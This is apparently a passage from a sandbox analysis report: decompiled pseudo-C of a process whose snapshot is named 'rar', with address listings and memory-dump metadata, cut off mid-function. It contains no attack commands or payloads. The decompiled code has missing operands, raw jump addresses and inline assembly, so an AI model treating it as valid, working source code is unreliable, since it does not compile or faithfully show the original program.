				E00007FF67FF650B689B8(_t25, __esp,  *((intOrPtr*)(_t476 + 0x7fb8)) +  *((intOrPtr*)(_t476 + 0x7fb0)), _t476 + 0x3a, _t479 + 0x1fb0, _t372,  >  ? _t356 : _t473);
				r12b = dil;
				r8d = 0x800;
				E00007FF67FF650B5A390(_t476 + 0x7fc2, _t479 + 0x1fb0, _t372);
				goto 0x50b694e2;
				 *(_t476 + 0x7f81) = r13b;
				E00007FF67FF650B283F0(0x50b85c80, _t479 + 0x1fb0, _t372,  >  ? _t356 : _t473);
				r8d = 0;
				_t359 =  *((intOrPtr*)( *_t476 + 0x20));
				 *0x50b80550();
				 *(_t481 + 0x20) = r13b;
				r9d = 0;
				r8d = 0;
				E00007FF67FF650B1B4D8(_t25, _t359, _t476, _t479 + 0x1fb0 +  *((intOrPtr*)(_t476 + 0x7fb8)) +  *((intOrPtr*)(_t476 + 0x7fb0)) +  *((intOrPtr*)(_t476 + 0x7f88)), _t372, _t504, _t505);
				E00007FF67FF650B320B8( >  ? _t356 : _t473, _t476, _t476);
				 *(_t481 + 0x50) = _t359;
				E00007FF67FF650B69B58(_t359, _t476);
				 *(_t481 + 0x68) = _t359;
				if (_t359 == 0) goto 0x50b6958a;
				 *(_t359 + 0x1028) = _t508;
				 *(_t359 + 0x1030) = _t508;
				 *(_t359 + 0x1038) = _t508;
				 *(_t359 + 0x1040) = _t508;
				 *(_t359 + 0x1048) = r13b;
				 *(_t359 + 0x1050) = _t508;
				 *(_t359 + 0x1058) = _t508;
				 *(_t359 + 0x1060) = _t508;
				goto 0x50b6958d;
				_t475 = _t508;
				 *(_t481 + 0x68) = _t475;
				E00007FF67FF650B36924(_t359, _t359, _t476 + 0x5880, _t475, _t476 + 0x5880, _t476, _t372);
				E00007FF67FF650B18198(1, _t476 + 0x5880, _t476);
				E00007FF67FF650B36924(_t359, _t359, _t476 + 0x5880, _t476 + 0x5880, _t475, _t476, _t372);
				if (r12b == 0) goto 0x50b6967a;
				if (E00007FF67FF650B3345C() == 0) goto 0x50b6962a;
				E00007FF67FF650B31C28(_t481 + 0x70);
				 *(_t481 + 0x38) = r13b;
				 *(_t481 + 0x30) = _t508;
				 *((long long*)(_t481 + 0x28)) = 0x7fffffff;
				 *(_t481 + 0x20) = _t481 + 0x40;
				r9d = 0x800;
				_t195 = E00007FF67FF650B317E8(0x7fffffff, _t510, _t481 + 0x70, _t475, _t476, _t479, _t479 + 0x1fb0,  *_t476);
				E00007FF67FF650B31C70(_t481 + 0x70);
				if (_t195 == 0) goto 0x50b6963d;
				if (E00007FF67FF650B326B4(_t195, _t195, 0x7fffffff, _t476, _t479 + 0x1fb0, _t476) != 0) goto 0x50b6967a;
				E00007FF67FF650B172F0(0x10, _t476 + 0x3a, _t476 + 0x3a, _t479 + 0x1fb0);
				E00007FF67FF650B2CC94(_t195, 0x10, 1, E00007FF67FF650B326B4(_t195, _t195, 0x7fffffff, _t476, _t479 + 0x1fb0, _t476), 0x7fffffff, _t475, _t476, _t479, _t476 + 0x3a);
				E00007FF67FF650B31FB0(_t476);
				E00007FF67FF650B2C930(9, E00007FF67FF650B326B4(_t195, _t195, 0x7fffffff, _t476, _t479 + 0x1fb0, _t476), 0x7fffffff, 0x50ba7ab8, _t476 + 0x3a, _t476 + 0x3a, _t479 + 0x1fb0);
				_t509 = _t476 + 0x3a;
				E00007FF67FF650B37F90(0, _t289, _t481 + 0x40, 0x7fffffff, 0x50ba7a90, _t509, _t479 + 0x1fb0);
				E00007FF67FF650B111C0(0x96, _t509);
				_t459 = _t510 + 0x74fc;
				if ( *_t459 == 0) goto 0x50b696ba;
				_t460 =  ==  ? 0x7fffffff : _t459;
				E00007FF67FF650B5A7B4(0, __esp, _t481 + 0x40, 0x7fffffff, _t509,  ==  ? 0x7fffffff : _t459, _t509);
				asm("dec eax");
				E00007FF67FF650B1A418(_t476, ( ==  ? 0x7fffffff : _t459) & _t511 + 0x00001050);
				 *((char*)(_t476 + 0x7f83)) = 0;
				 *((short*)(_t476 + 0x7f80)) = 0;
				 *((long long*)(_t476 + 0x7f88)) = 0x7fffffff;
				 *((long long*)(_t476 + 0x34c0)) = 0x7fffffff;
				 *((long long*)(_t476 + 0x34d0)) = 0x7fffffff;
				r12d = 0x800;
				r8d = r12d;
				_t462 = _t509;
				E00007FF67FF650B5A390(_t479 + 0xfb0, _t462, _t509);
				r8b =  *((intOrPtr*)(_t510 + 0x71cc));
				_t412 = _t479 + 0xfb0;
				E00007FF67FF650B44E90(0x96, r12d,  ~_t511, 0x7fffffff, _t412, _t476, _t479);
				_t507 = _t510 + 0x7178;
				if (_t412 -  *((intOrPtr*)(_t510 + 0x7188)) >= 0) goto 0x50b6974a;
				 *_t507 =  *((intOrPtr*)( *((intOrPtr*)(_t510 + 0x7180)) + _t412 * 8));
				 *((intOrPtr*)(_t476 + 0x7fa4)) =  *((intOrPtr*)(_t476 + 0x7fa4)) + 1;
				if (E00007FF67FF650B337B0( *((intOrPtr*)(_t510 + 0x7180)), _t479 + 0xfb0) == 0) goto 0x50b6978b;
				if ( *_t507 == 0x7fffffff) goto 0x50b6978b;
				E00007FF67FF650B33548(0x7fffffff, _t479 + 0xfb0);
				_t248 =  <  ? 1 : 0;
				if ( *((intOrPtr*)(_t510 + 0x71ac)) != 0) goto 0x50b697e9;
				if ( *(_t510 + 0x743b) != 0) goto 0x50b697a3;
				_t317 =  <  ? 1 : 0;
				if (( <  ? 1 : 0) == 0) goto 0x50b697e9;
				_t101 = _t481 + 0x40; // 0x840
				if (E00007FF67FF650B5C898(0x800, _t25,  <  ? 1 : 0, 0x7fffffff, _t479 + 0xfb0, _t475, _t476, _t101, _t507) != 0) goto 0x50b697d1;
				E00007FF67FF650B2C930(0xff, E00007FF67FF650B5C898(0x800, _t25,  <  ? 1 : 0, 0x7fffffff, _t479 + 0xfb0, _t475, _t476, _t101, _t507), 0x7fffffff, 0x50ba7ab8, _t462, _t101, _t507);
				if ( *((intOrPtr*)(_t481 + 0x40)) == 0) goto 0x50b697e9;
				if ( *((intOrPtr*)(_t510 + 0x71c9)) != 0) goto 0x50b697f2;
				 *(_t510 + 0x743b) = 0;
				if ( *((intOrPtr*)(_t510 + 0x71c9)) == 0) goto 0x50b697fe;
				E00007FF67FF650B332F0( <  ? 1 : 0,  *((intOrPtr*)(_t476 + 0x7fa4)), 0x7fffffff, 0x7fffffff, _t479 + 0xfb0, _t462, _t475, _t476, _t507);
				_t378 =  *(_t481 + 0x50);
				r13d = 0;
				_t216 = E00007FF67FF650B33548(0x7fffffff, _t479 + 0xfb0);
				if (0x7fffffff - 0x2710 < 0) goto 0x50b69861;
				if ( *_t507 == 0x7fffffff) goto 0x50b69844;
				goto 0x50b6984a;
				_t465 = _t462 +  *_t507 + _t378 >> 6;
				_t367 = _t465 >> 0x3f;
				if (_t465 + (_t465 >> 0x3f) - 0x7fffffff <= 0) goto 0x50b698e1;
				E00007FF67FF650B5C860(_t216 *  *_t507 * _t378, 2);
				E00007FF67FF650B164E4(0x81);
				if ( *((intOrPtr*)(_t510 + 0x71ac)) != r13b) goto 0x50b6989b;
				_t119 = _t481 + 0x40; // 0x840
				if (E00007FF67FF650B5C898(0x800, _t25,  *((intOrPtr*)(_t510 + 0x71ac)) - r13b, _t465 >> 0x3f, _t479 + 0xfb0, _t475, 0x7fffffff, _t119, _t507) != 0) goto 0x50b698ac;
				E00007FF67FF650B2C930(0xff, E00007FF67FF650B5C898(0x800, _t25,  *((intOrPtr*)(_t510 + 0x71ac)) - r13b, _t465 >> 0x3f, _t479 + 0xfb0, _t475, 0x7fffffff, _t119, _t507), _t378, 0x50ba7ab8, _t465 + (_t465 >> 0x3f), _t119, _t507);
				if ( *((intOrPtr*)(_t481 + 0x40)) == r13b) goto 0x50b698c3;
				if ( *((intOrPtr*)(_t510 + 0x71c9)) != r13b) goto 0x50b698d0;
				 *(_t510 + 0x743b) = r13b;
				if ( *((intOrPtr*)(_t510 + 0x71c9)) == r13b) goto 0x50b6981a;
				E00007FF67FF650B332F0( <  ? 1 : 0, 0x81, _t465 >> 0x3f, _t378, _t479 + 0xfb0, _t465 + (_t465 >> 0x3f), _t475, 0x7fffffff, _t507);
				goto 0x50b6981a;
				 *(_t481 + 0x38) = 0;
				 *(_t481 + 0x30) = _t378;
				 *((long long*)(_t481 + 0x28)) = 0x7fffffff;
				 *(_t481 + 0x20) = _t378;
				r9d = 0x800;
				_t478 =  *((intOrPtr*)(_t481 + 0x58));
				if (E00007FF67FF650B317E8(_t378, _t510, _t478, _t475, _t478, _t479, _t479 + 0xfb0, _t507) != 0) goto 0x50b699d2;
				_t133 = _t478 + 0x3a; // 0x3a
				E00007FF67FF650B111C0(0x82, _t133);
				if ( *((intOrPtr*)(_t510 + 0x71ac)) != 0) goto 0x50b6995e;
				_t503 = _t507;
				_t135 = _t481 + 0x40; // 0x840
				if (E00007FF67FF650B5C898(0x800, _t25,  *((intOrPtr*)(_t510 + 0x71ac)), _t465 >> 0x3f, _t479 + 0xfb0, _t475, _t478, _t135, _t503) != 0) goto 0x50b6996f;
				E00007FF67FF650B2C930(9, E00007FF67FF650B5C898(0x800, _t25,  *((intOrPtr*)(_t510 + 0x71ac)), _t465 >> 0x3f, _t479 + 0xfb0, _t475, _t478, _t135, _t503), _t378, 0x50ba7ab8, _t133, _t135, _t503);
				if ( *((intOrPtr*)(_t481 + 0x40)) == 0) goto 0x50b69985;
				if ( *((intOrPtr*)(_t510 + 0x71c9)) != 0) goto 0x50b6998e;
				 *(_t510 + 0x743b) = 0;
				if ( *((intOrPtr*)(_t510 + 0x71c9)) == 0) goto 0x50b6999a;
				E00007FF67FF650B332F0(0, 0x82, _t465 >> 0x3f, _t378, _t479 + 0xfb0, _t133, _t475, _t478, _t503);
				 *(_t481 + 0x38) = 0;
				 *(_t481 + 0x30) = _t378;
				 *((long long*)(_t481 + 0x28)) = 0x7fffffff;
				 *(_t481 + 0x20) = _t378;
				r9d = 0x800;
				if (E00007FF67FF650B317E8(_t378, _t510, _t478, _t475, _t478, _t479, _t479 + 0xfb0, _t503) == 0) goto 0x50b6992a;
				_t515 =  *((intOrPtr*)(_t481 + 0x48));
				 *(_t481 + 0x20) = 0;
				r9d = 0;
				r8d = 0;
				E00007FF67FF650B1B4D8(0, _t367, _t478, _t478, _t479 + 0xfb0, _t504, _t505);
				if ( *((intOrPtr*)(_t478 + 0x7f84)) == 0) goto 0x50b69a0d;
				if ( *((intOrPtr*)(_t478 + 0x7f78)) != 3) goto 0x50b69a0d;
				 *(_t481 + 0x20) = 0;
				r9d = 0;
				r8d = 0;
				_t152 =  &(_t503[0]); // 0x4
				E00007FF67FF650B1B4D8(_t152, _t367, _t478, _t478, _t479 + 0xfb0, _t504, _t505);
				 *(_t481 + 0x20) = 0;
				r9d = 0;
				r8d = 0;
				_t154 =  &(_t503[0]); // 0x1
				E00007FF67FF650B1B4D8(_t154, _t367, _t478, _t478, _t479 + 0xfb0, _t504, _t505);
				E00007FF67FF650B69198(0x82, _t154, _t378, _t478,  *_t507, _t475, _t478, _t479, _t479 + 0xfb0, _t503);
				if ( *((intOrPtr*)(_t478 + 0x7f7c)) == 0) goto 0x50b69a46;
				E00007FF67FF650B54598(0xd38, _t25, _t378, _t478, _t479, _t479 + 0xfb0);
				goto 0x50b69a4d;
				E00007FF67FF650B54598(0xd08, _t25, 0x50b85c94, _t478, _t479, _t479 + 0xfb0);
				_t156 = _t478 + 0x3a; // 0x3a
				E00007FF67FF650B283F0(_t367, 0x50b85c94, _t156, _t503);
				_t381 =  *((intOrPtr*)(_t481 + 0x60));
				r12d = 0;
				if (_t381 == 0) goto 0x50b69a86;
				 *0x50b80550();
				 *_t381 =  *((intOrPtr*)( *_t478 + 0x28));
				if (_t515 == 0) goto 0x50b69b0a;
				 *(_t515 + 0x1068) = _t507;
				 *((short*)(_t515 + 0x10a8)) = 1;
				_t238 = E00007FF67FF650B1A9D0(_t515, _t478, 0x50b85c94, _t156);
				if ( *((intOrPtr*)(_t478 + 0x34be)) == r12b) goto 0x50b69ad5;
				if ( *((intOrPtr*)(_t510 + 0x2018)) == r12d) goto 0x50b69ad5;
				_t436 = _t478;
				E00007FF67FF650B18DA0(_t238,  *((intOrPtr*)(_t515 + 0xc)), _t436, 0x50b85c94);
				 *((intOrPtr*)(_t478 + 0x7fa8)) =  *((intOrPtr*)(_t478 + 0x7fa8)) - _t436;
				 *(_t481 + 0x20) = 1;
				r9d = 0;
				E00007FF67FF650B1B4D8( *((intOrPtr*)(_t515 + 4)),  *((intOrPtr*)( *_t478 + 0x28)), _t478, 0x50b85c94, _t515, _t504, _t505);
				if ( *((intOrPtr*)(_t510 + 0x7157)) != r12b) goto 0x50b69b0a;
				E00007FF67FF650B54598(0xd3e, _t288, _t381, _t478, _t479, _t515);
				E00007FF67FF650B283F0( *((intOrPtr*)( *_t478 + 0x28)), _t515 + 0x28, _t515, _t503);
				 *(_t478 + 0x7fa2) = r12b;
				if (_t475 == 0) goto 0x50b69b2f;
				_t173 = _t475 + 0x1028; // -6640827866535434445
				_t243 = E00007FF67FF650B11534(_t173);
				0x50b69b94();
				return E00007FF67FF650B69D10(_t243, 0xd3e,  *(_t479 + 0x2fb0) ^ _t481);
			}









































                                                                                                            0x7ff650b692c4
                                                                                                            0x7ff650b692c4
                                                                                                            0x7ff650b692c4
                                                                                                            0x7ff650b692d1
                                                                                                            0x7ff650b692de
                                                                                                            0x7ff650b692e3
                                                                                                            0x7ff650b692e6
                                                                                                            0x7ff650b692f0
                                                                                                            0x7ff650b692f7
                                                                                                            0x7ff650b692fa
                                                                                                            0x7ff650b692fd
                                                                                                            0x7ff650b69302
                                                                                                            0x7ff650b69305
                                                                                                            0x7ff650b6930a
                                                                                                            0x7ff650b6930d
                                                                                                            0x7ff650b6931a
                                                                                                            0x7ff650b69320
                                                                                                            0x7ff650b6932a
                                                                                                            0x7ff650b69334
                                                                                                            0x7ff650b6933d
                                                                                                            0x7ff650b69346
                                                                                                            0x7ff650b6935a
                                                                                                            0x7ff650b6935c
                                                                                                            0x7ff650b6936a
                                                                                                            0x7ff650b69377
                                                                                                            0x7ff650b69379
                                                                                                            0x7ff650b69380
                                                                                                            0x7ff650b69387
                                                                                                            0x7ff650b6938e
                                                                                                            0x7ff650b6939b
                                                                                                            0x7ff650b693a3
                                                                                                            0x7ff650b693b1
                                                                                                            0x7ff650b693b7
                                                                                                            0x7ff650b693ba
                                                                                                            0x7ff650b693bf
                                                                                                            0x7ff650b693cc
                                                                                                            0x7ff650b693d1
                                                                                                            0x7ff650b693d8
                                                                                                            0x7ff650b693e4
                                                                                                            0x7ff650b693e9
                                                                                                            0x7ff650b693e9
                                                                                                            0x7ff650b693ee
                                                                                                            0x7ff650b693f1
                                                                                                            0x7ff650b693f4
                                                                                                            0x7ff650b69403
                                                                                                            0x7ff650b69409
                                                                                                            0x7ff650b69410
                                                                                                            0x7ff650b6941e
                                                                                                            0x7ff650b69420
                                                                                                            0x7ff650b6942b
                                                                                                            0x7ff650b69430
                                                                                                            0x7ff650b6943e
                                                                                                            0x7ff650b69441
                                                                                                            0x7ff650b6944b
                                                                                                            0x7ff650b6945b
                                                                                                            0x7ff650b6945f
                                                                                                            0x7ff650b69468
                                                                                                            0x7ff650b69471
                                                                                                            0x7ff650b6947c
                                                                                                            0x7ff650b69484
                                                                                                            0x7ff650b6948d
                                                                                                            0x7ff650b694a3
                                                                                                            0x7ff650b694a8
                                                                                                            0x7ff650b694ab
                                                                                                            0x7ff650b694b8
                                                                                                            0x7ff650b694bd
                                                                                                            0x7ff650b694ce
                                                                                                            0x7ff650b694d4
                                                                                                            0x7ff650b694d9
                                                                                                            0x7ff650b694db
                                                                                                            0x7ff650b694e9
                                                                                                            0x7ff650b69507
                                                                                                            0x7ff650b6950d
                                                                                                            0x7ff650b69511
                                                                                                            0x7ff650b69517
                                                                                                            0x7ff650b6951c
                                                                                                            0x7ff650b6951f
                                                                                                            0x7ff650b69527
                                                                                                            0x7ff650b6952f
                                                                                                            0x7ff650b69534
                                                                                                            0x7ff650b6953e
                                                                                                            0x7ff650b69546
                                                                                                            0x7ff650b6954e
                                                                                                            0x7ff650b69550
                                                                                                            0x7ff650b69557
                                                                                                            0x7ff650b6955e
                                                                                                            0x7ff650b69565
                                                                                                            0x7ff650b6956c
                                                                                                            0x7ff650b69573
                                                                                                            0x7ff650b6957a
                                                                                                            0x7ff650b69581
                                                                                                            0x7ff650b69588
                                                                                                            0x7ff650b6958a
                                                                                                            0x7ff650b6958d
                                                                                                            0x7ff650b6959f
                                                                                                            0x7ff650b695a9
                                                                                                            0x7ff650b695b4
                                                                                                            0x7ff650b695c6
                                                                                                            0x7ff650b695da
                                                                                                            0x7ff650b695e1
                                                                                                            0x7ff650b695e7
                                                                                                            0x7ff650b695ec
                                                                                                            0x7ff650b695f1
                                                                                                            0x7ff650b695fb
                                                                                                            0x7ff650b69600
                                                                                                            0x7ff650b69615
                                                                                                            0x7ff650b69621
                                                                                                            0x7ff650b69628
                                                                                                            0x7ff650b6963b
                                                                                                            0x7ff650b69650
                                                                                                            0x7ff650b6965c
                                                                                                            0x7ff650b69664
                                                                                                            0x7ff650b69675
                                                                                                            0x7ff650b6967a
                                                                                                            0x7ff650b6968a
                                                                                                            0x7ff650b69697
                                                                                                            0x7ff650b6969c
                                                                                                            0x7ff650b696a8
                                                                                                            0x7ff650b696ae
                                                                                                            0x7ff650b696b5
                                                                                                            0x7ff650b696c7
                                                                                                            0x7ff650b696d0
                                                                                                            0x7ff650b696d5
                                                                                                            0x7ff650b696db
                                                                                                            0x7ff650b696e2
                                                                                                            0x7ff650b696e9
                                                                                                            0x7ff650b696f0
                                                                                                            0x7ff650b696f7
                                                                                                            0x7ff650b696fd
                                                                                                            0x7ff650b69700
                                                                                                            0x7ff650b6970a
                                                                                                            0x7ff650b6970f
                                                                                                            0x7ff650b69719
                                                                                                            0x7ff650b69720
                                                                                                            0x7ff650b6972b
                                                                                                            0x7ff650b69739
                                                                                                            0x7ff650b69746
                                                                                                            0x7ff650b6974a
                                                                                                            0x7ff650b6975e
                                                                                                            0x7ff650b6976e
                                                                                                            0x7ff650b69777
                                                                                                            0x7ff650b69788
                                                                                                            0x7ff650b69794
                                                                                                            0x7ff650b6979d
                                                                                                            0x7ff650b6979f
                                                                                                            0x7ff650b697a1
                                                                                                            0x7ff650b697a6
                                                                                                            0x7ff650b697be
                                                                                                            0x7ff650b697cc
                                                                                                            0x7ff650b697d7
                                                                                                            0x7ff650b697e0
                                                                                                            0x7ff650b697e2
                                                                                                            0x7ff650b697f0
                                                                                                            0x7ff650b697f9
                                                                                                            0x7ff650b697fe
                                                                                                            0x7ff650b69803
                                                                                                            0x7ff650b69821
                                                                                                            0x7ff650b6982f
                                                                                                            0x7ff650b69838
                                                                                                            0x7ff650b69842
                                                                                                            0x7ff650b6984a
                                                                                                            0x7ff650b69851
                                                                                                            0x7ff650b6985b
                                                                                                            0x7ff650b69866
                                                                                                            0x7ff650b69870
                                                                                                            0x7ff650b6987c
                                                                                                            0x7ff650b69881
                                                                                                            0x7ff650b69899
                                                                                                            0x7ff650b698a7
                                                                                                            0x7ff650b698b1
                                                                                                            0x7ff650b698ba
                                                                                                            0x7ff650b698bc
                                                                                                            0x7ff650b698ca
                                                                                                            0x7ff650b698d7
                                                                                                            0x7ff650b698dc
                                                                                                            0x7ff650b698e3
                                                                                                            0x7ff650b698e7
                                                                                                            0x7ff650b698ec
                                                                                                            0x7ff650b698f1
                                                                                                            0x7ff650b698f6
                                                                                                            0x7ff650b69903
                                                                                                            0x7ff650b6991a
                                                                                                            0x7ff650b6992a
                                                                                                            0x7ff650b69933
                                                                                                            0x7ff650b6993f
                                                                                                            0x7ff650b69941
                                                                                                            0x7ff650b69944
                                                                                                            0x7ff650b6995c
                                                                                                            0x7ff650b6996a
                                                                                                            0x7ff650b69973
                                                                                                            0x7ff650b6997c
                                                                                                            0x7ff650b6997e
                                                                                                            0x7ff650b6998c
                                                                                                            0x7ff650b69995
                                                                                                            0x7ff650b6999a
                                                                                                            0x7ff650b6999e
                                                                                                            0x7ff650b699a3
                                                                                                            0x7ff650b699a8
                                                                                                            0x7ff650b699ad
                                                                                                            0x7ff650b699c7
                                                                                                            0x7ff650b699cd
                                                                                                            0x7ff650b699d2
                                                                                                            0x7ff650b699d6
                                                                                                            0x7ff650b699d9
                                                                                                            0x7ff650b699e1
                                                                                                            0x7ff650b699ec
                                                                                                            0x7ff650b699f5
                                                                                                            0x7ff650b699f7
                                                                                                            0x7ff650b699fb
                                                                                                            0x7ff650b699fe
                                                                                                            0x7ff650b69a01
                                                                                                            0x7ff650b69a08
                                                                                                            0x7ff650b69a0d
                                                                                                            0x7ff650b69a11
                                                                                                            0x7ff650b69a14
                                                                                                            0x7ff650b69a17
                                                                                                            0x7ff650b69a1e
                                                                                                            0x7ff650b69a2a
                                                                                                            0x7ff650b69a35
                                                                                                            0x7ff650b69a3c
                                                                                                            0x7ff650b69a44
                                                                                                            0x7ff650b69a52
                                                                                                            0x7ff650b69a5a
                                                                                                            0x7ff650b69a61
                                                                                                            0x7ff650b69a66
                                                                                                            0x7ff650b69a6b
                                                                                                            0x7ff650b69a71
                                                                                                            0x7ff650b69a7d
                                                                                                            0x7ff650b69a83
                                                                                                            0x7ff650b69a89
                                                                                                            0x7ff650b69a8b
                                                                                                            0x7ff650b69a92
                                                                                                            0x7ff650b69aa8
                                                                                                            0x7ff650b69ab4
                                                                                                            0x7ff650b69abd
                                                                                                            0x7ff650b69ac3
                                                                                                            0x7ff650b69ac6
                                                                                                            0x7ff650b69ace
                                                                                                            0x7ff650b69ad5
                                                                                                            0x7ff650b69ad9
                                                                                                            0x7ff650b69ae6
                                                                                                            0x7ff650b69af2
                                                                                                            0x7ff650b69af9
                                                                                                            0x7ff650b69b05
                                                                                                            0x7ff650b69b0a
                                                                                                            0x7ff650b69b14
                                                                                                            0x7ff650b69b16
                                                                                                            0x7ff650b69b1d
                                                                                                            0x7ff650b69b2a
                                                                                                            0x7ff650b69b51

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2aabd76666ae371b8d9e74076f7fbea55cb3ab84d5b260cbb4267c1b0863f791
                                                                                                            • Instruction ID: eadb5d6786aa023cb81acde2d4de26b38bc4d83f0e3552e4e90104b07f362c2d
                                                                                                            • Opcode Fuzzy Hash: 2aabd76666ae371b8d9e74076f7fbea55cb3ab84d5b260cbb4267c1b0863f791
                                                                                                            • Instruction Fuzzy Hash: DD22E662A0C6C365EB20DB25E4901FE67A9FB47788F484135DA8E9B786DF3EE505C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B48264 Relevance: .4, Instructions: 441COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 66%
                                                                                                            			E00007FF67FF650B48264(void* __edx, void* __eflags, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, signed int __r8, void* __r9, void* __r10, void* __r11, long long _a16, long long _a24, long long _a32) {
				void* _v40;
				signed int _v56;
				signed int _v64;
				intOrPtr _v68;
				long long _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				signed int _v88;
				signed char* _v96;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v136;
				void* _t162;
				void* _t180;
				intOrPtr _t186;
				void* _t195;
				signed int _t209;
				signed int _t212;
				signed int _t216;
				void* _t217;
				signed int _t220;
				signed int _t230;
				signed int _t233;
				signed int _t241;
				intOrPtr _t242;
				intOrPtr _t248;
				signed int _t255;
				void* _t258;
				signed int _t259;
				void* _t269;
				void* _t277;
				signed int _t301;
				void* _t303;
				signed long long _t314;
				signed long long _t315;
				intOrPtr** _t317;
				intOrPtr _t320;
				signed char* _t321;
				signed char* _t322;
				void* _t324;
				intOrPtr* _t327;
				intOrPtr* _t328;
				void* _t332;
				signed char* _t333;
				signed char* _t336;
				intOrPtr* _t340;
				void* _t344;
				signed int* _t349;
				void* _t351;
				void* _t352;
				void* _t353;
				signed char* _t355;
				void* _t356;

				_t353 = __r11;
				_t352 = __r10;
				_t332 = __rdx;
				_a16 = __rbx;
				_a24 = __rsi;
				_a32 = __rdi;
				_t345 = _t344 - 0x80;
				_t314 =  *0x50b978f0; // 0x27db226282f1
				_t315 = _t314 ^ _t344 - 0x00000080;
				_v56 = _t315;
				_t317 = __rcx;
				if (__eflags == 0) goto 0x50b4876f;
				if (__eflags == 0) goto 0x50b4876f;
				if (__eflags == 0) goto 0x50b4863e;
				if (__eflags == 0) goto 0x50b48543;
				if (__eflags == 0) goto 0x50b4832f;
				if (__edx - 0xfffffffffffffffd != 1) goto 0x50b487e6;
				_t230 =  *(__rcx + 0x18);
				r11d = 0;
				r8d =  *(__rcx + 8);
				_t258 = __rdx + __rdx;
				if (_t230 - 0x20000 > 0) goto 0x50b487ea;
				if (__r8 - 1 - 0x3ff > 0) goto 0x50b487ea;
				if (r8d == 0) goto 0x50b487e6;
				r10b = 0;
				r9d = _t230;
				if (_t230 - _t258 >= 0) goto 0x50b48322;
				_t320 =  *((intOrPtr*)(__rcx));
				r9d = r9d + r8d;
				r10b = r10b -  *((intOrPtr*)(__r11 + _t320));
				r11d = r11d + 1;
				 *((intOrPtr*)(_t315 + _t320)) = r10b;
				_t269 = r9d - _t258;
				if (_t269 < 0) goto 0x50b48309;
				if (_t269 != 0) goto 0x50b482ff;
				goto 0x50b487e6;
				r14d =  *(__rcx + 0x18);
				_t321 =  *((intOrPtr*)(__rcx));
				_t259 =  *(__rcx + 8);
				_t355 =  &(_t321[_t356]);
				if (r14d - 0x20000 > 0) goto 0x50b487ea;
				if (__rsi - 1 - 0x7f > 0) goto 0x50b487ea;
				_v120 = 0;
				if (_t259 == 0) goto 0x50b487e6;
				_v108 = _v108 & 0x00000000;
				r8d = 0;
				_v72 = __r8;
				_v116 = _v116 & 0;
				r15d = 0;
				_v64 = r8d;
				r11d = 0;
				r10d = 0;
				asm("xorps xmm0, xmm0");
				r12d = 0;
				asm("movups [ebp-0x30], xmm0");
				if (0 - r14d >= 0) goto 0x50b48531;
				r9d = 0;
				_v116 = r15d;
				r8d = r15d;
				r8d = r8d;
				_t233 =  *_t321 & 0x000000ff;
				_t322 =  &(_t321[1]);
				_v104 = r8d;
				_v96 = _t322;
				r8d = _v108;
				_t209 = (_t322 + __r8 * 0x00000008 >> 0x00000003 & 0x000000ff) - _t233;
				_v108 = _t209;
				_t355[_t315] = _t209;
				r8d = _t209 - r8b;
				_v112 = r8d;
				r8d = _t315 * 8;
				asm("cdq");
				r15d = r8d;
				r15d = r15d ^ _t233;
				r15d = r15d - _t233;
				asm("cdq");
				r15d = r15d + _v88;
				_v88 = r15d;
				_v84 = _v84 + (r8d - _v116 ^ _t233) - _t233;
				asm("cdq");
				_v80 = _v80 + ( &(_t322[__r8]) ^ _t233) - _t233;
				asm("cdq");
				_v76 = _v76 + (r8d - _v104 ^ _t233) - _t233;
				asm("cdq");
				_v72 = _v72 + ( &(_t322[__r8]) ^ _t233) - _t233;
				asm("cdq");
				_v68 = _v68 + (r8d - r9d ^ _t233) - _t233;
				asm("cdq");
				_v64 = _v64 + (__r8 + __r9 ^ _t233) - _t233;
				if ((dil & 0x0000001f) != 0) goto 0x50b48512;
				_t349 =  &_v84;
				_v88 = _v88 & 0;
				_t57 = _t332 + 1; // 0x1
				r8d = _t57;
				_t212 =  *_t349;
				_t158 =  >=  ? 0 : r8d;
				 *_t349 =  *_t349 & 0x00000000;
				r8d = r8d + 1;
				_t235 =  >=  ? 0 : r8d;
				_t213 =  >=  ? r15d : _t212;
				r15d =  >=  ? r15d : _t212;
				_t277 = r8d - 7;
				if (_t277 < 0) goto 0x50b4847c;
				_t236 = ( >=  ? 0 : r8d) - 1;
				if (_t277 == 0) goto 0x50b48509;
				_t237 =  >=  ? 0 : r8d;
				if (_t277 == 0) goto 0x50b484f8;
				_t238 = ( >=  ? 0 : r8d) - 0xffffffffffffffff;
				if (_t277 == 0) goto 0x50b484e7;
